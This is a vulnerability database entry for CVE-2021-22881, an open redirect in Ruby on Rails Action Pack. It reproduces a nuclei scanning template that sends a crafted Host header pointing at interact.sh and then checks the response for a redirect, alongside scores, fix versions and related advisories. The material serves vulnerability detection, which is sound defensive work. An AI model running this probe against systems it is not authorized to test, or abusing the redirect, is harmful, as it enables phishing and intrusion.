Lucene search
K

Ruby on Rails - Open Redirect via Host Header Injection

🗓️ 12 Jul 2026 03:00:37Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Open redirect in Ruby on Rails Action Pack via crafted Host headers before 6.1.2.1 and 6.0.3.5; update to fixed version.

Related
Refs
Code
ReporterTitlePublishedViews
Family
FreeBSD
Rails -- multiple vulnerabilities
10 Feb 202100:00
freebsd
Circl
CVE-2021-22881
11 Feb 202120:42
circl
CNNVD
Rails Action Pack Input Validation Error Vulnerability
11 Feb 202100:00
cnnvd
CVE
CVE-2021-22881
11 Feb 202116:12
cve
Cvelist
CVE-2021-22881
11 Feb 202116:12
cvelist
Debian CVE
CVE-2021-22881
11 Feb 202116:12
debiancve
EUVD
EUVD-2021-0631
7 Oct 202500:30
euvd
Fedora
[SECURITY] Fedora 33 Update: rubygem-actionpack-6.0.3.4-2.fc33
12 Mar 202120:30
fedora
Fedora
[SECURITY] Fedora 33 Update: rubygem-activerecord-6.0.3.4-2.fc33
12 Mar 202120:30
fedora
Tenable Nessus
Fedora 33 : 1:rubygem-actionpack / 1:rubygem-activerecord (2021-b571fca1b8)
15 Mar 202100:00
nessus
Rows per page
id: CVE-2021-22881

info:
  name: Ruby on Rails - Open Redirect via Host Header Injection
  author: theamanrawat
  severity: medium
  description: |
    Ruby on Rails action pack before 6.1.2.1, 6.0.3.5 contains an open redirect caused by special crafted Host headers in combination with allowed host formats, letting attackers redirect users to malicious websites, exploit requires attacker to control Host headers.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to version 6.1.2.1, 6.0.3.5 or later versions.
  reference:
    - https://hackerone.com/reports/1047447
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22881
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-22881
    epss-score: 0.87301
    epss-percentile: 0.99733
    cwe-id: CWE-601
  metadata:
    verified: false
    max-request: 1
  tags: cve,cve2021,ruby,rails,host-header,redirect,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: interact.sh#{{randstr}}.{{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 4a0a004730450221008570738ea17d863c6b9972dec1b8473df34c1f1c3b883ad1d1a6fcbf4afc549102202159af2e891c70bd31fd482c08aad998f959acc83b386c3d56291fc618fc8cc2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 25.8
CVSS 3.16.1
EPSS0.87301
25